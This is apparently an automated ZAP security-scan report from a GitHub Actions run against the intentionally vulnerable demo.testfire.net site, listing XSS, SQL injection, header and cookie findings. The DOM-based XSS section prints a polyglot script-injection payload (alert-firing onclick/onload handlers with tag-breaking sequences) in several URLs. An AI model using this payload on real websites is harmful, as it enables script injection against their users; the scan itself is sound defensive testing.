ZAP Full Scan Report
Created by: github-actions[bot]
-
Site: http://demo.testfire.net
-
Site: https://demo.testfire.net New Alerts
-
Cross Site Scripting (DOM Based) [40026] total: 49:
- [https://demo.testfire.net#jaVasCript:/-/
/*\
/'/"//(/* /oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e](https://demo.testfire.net#jaVasCript:/-//*\
/'/*"//(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e) - [https://demo.testfire.net/#jaVasCript:/-/
/*\
/'/"//(/* /oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e](https://demo.testfire.net/#jaVasCript:/-//*\
/'/*"//(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e) - [https://demo.testfire.net/admin#jaVasCript:/-/
/*\
/'/"//(/* /oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e](https://demo.testfire.net/admin#jaVasCript:/-//*\
/'/*"//(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e) - [https://demo.testfire.net/cgi.exe#jaVasCript:/-/
/*\
/'/"//(/* /oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e](https://demo.testfire.net/cgi.exe#jaVasCript:/-//*\
/'/*"//(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e) - [https://demo.testfire.net/default.jsp?content=security.htm#jaVasCript:/-/
/*\
/'/"//(/* /oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e](https://demo.testfire.net/default.jsp?content=security.htm#jaVasCript:/-//*\
/'/*"//(/* */oNcliCk=alert(5397) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(5397)//>\x3e) - ..
- [https://demo.testfire.net#jaVasCript:/-/
- Cross Site Scripting (Reflected) [40012] total: 2:
- SQL Injection [40018] total: 4:
- Absence of Anti-CSRF Tokens [10202] total: 11:
- Anti-CSRF Tokens Check [20012] total: 49:
- Content Security Policy (CSP) Header Not Set [10038] total: 12:
-
Insecure HTTP Method - PUT [90028] total: 67:
- https://demo.testfire.net/cgi.exe/eb05ro2hms
- https://demo.testfire.net/disclaimer.htm?url=http://www.microsoft.com/zeie48g9rx
- https://demo.testfire.net/Documents/JohnSmith/cgi.exe/gqjah8f8w0
- https://demo.testfire.net/Documents/JohnSmith/VoluteeringInformation.pdf/j7cr6k0t9c
- https://demo.testfire.net/Documents/JohnSmith/z6gbvuagu2
- ..
- Missing Anti-clickjacking Header [10020] total: 11:
- Relative Path Confusion [10051] total: 78:
- Secure Pages Include Mixed Content (Including Scripts) [10040] total: 1:
- Source Code Disclosure - SQL [10099] total: 1:
- Sub Resource Integrity Attribute Missing [90003] total: 1:
- Cookie Slack Detector [90027] total: 93:
- Cookie without SameSite Attribute [10054] total: 3:
- Cross-Domain JavaScript Source File Inclusion [10017] total: 1:
- Dangerous JS Functions [10110] total: 3:
- HTTPS Content Available via HTTP [10047] total: 56:
- Permissions Policy Header Not Set [10063] total: 11:
- Secure Pages Include Mixed Content [10040] total: 2:
- Server Leaks Version Information via "Server" HTTP Response Header Field [10036] total: 11:
- Strict-Transport-Security Header Not Set [10035] total: 11:
- Timestamp Disclosure - Unix [10096] total: 2:
- X-Content-Type-Options Header Missing [10021] total: 11:
- Cookie Slack Detector [90027] total: 2:
-
Information Disclosure - Suspicious Comments [10027] total: 15:
- https://demo.testfire.net/index.jsp?content=inside_jobs.htm
- https://demo.testfire.net/index.jsp?content=inside_jobs.htm&job=CustomerServiceRepresentative:CustomerService
- https://demo.testfire.net/index.jsp?content=inside_jobs.htm&job=ExecutiveAssistant:Administration
- https://demo.testfire.net/index.jsp?content=inside_jobs.htm&job=LoyaltyMarketingProgramManager:Marketing
- https://demo.testfire.net/index.jsp?content=inside_jobs.htm&job=MortgageLendingAccountExecutive:Sales
- ..
-
Modern Web Application [10109] total: 6:
- https://demo.testfire.net/disclaimer.htm?url=http://www.microsoft.com
- https://demo.testfire.net/disclaimer.htm?url=http://www.netscape.com
- https://demo.testfire.net/index.jsp?content=inside.htm
- https://demo.testfire.net/index.jsp?content=inside_volunteering.htm
- https://demo.testfire.net/index.jsp?content=personal_other.htm
- ..
- Re-examine Cache-control Directives [10015] total: 11:
- Session Management Response Identified [10112] total: 5:
- Storable and Cacheable Content [10049] total: 11:
- User Agent Fuzzer [10104] total: 108:
-
Cross Site Scripting (DOM Based) [40026] total: 49:
View the following link to download the report. RunnerID:7782131864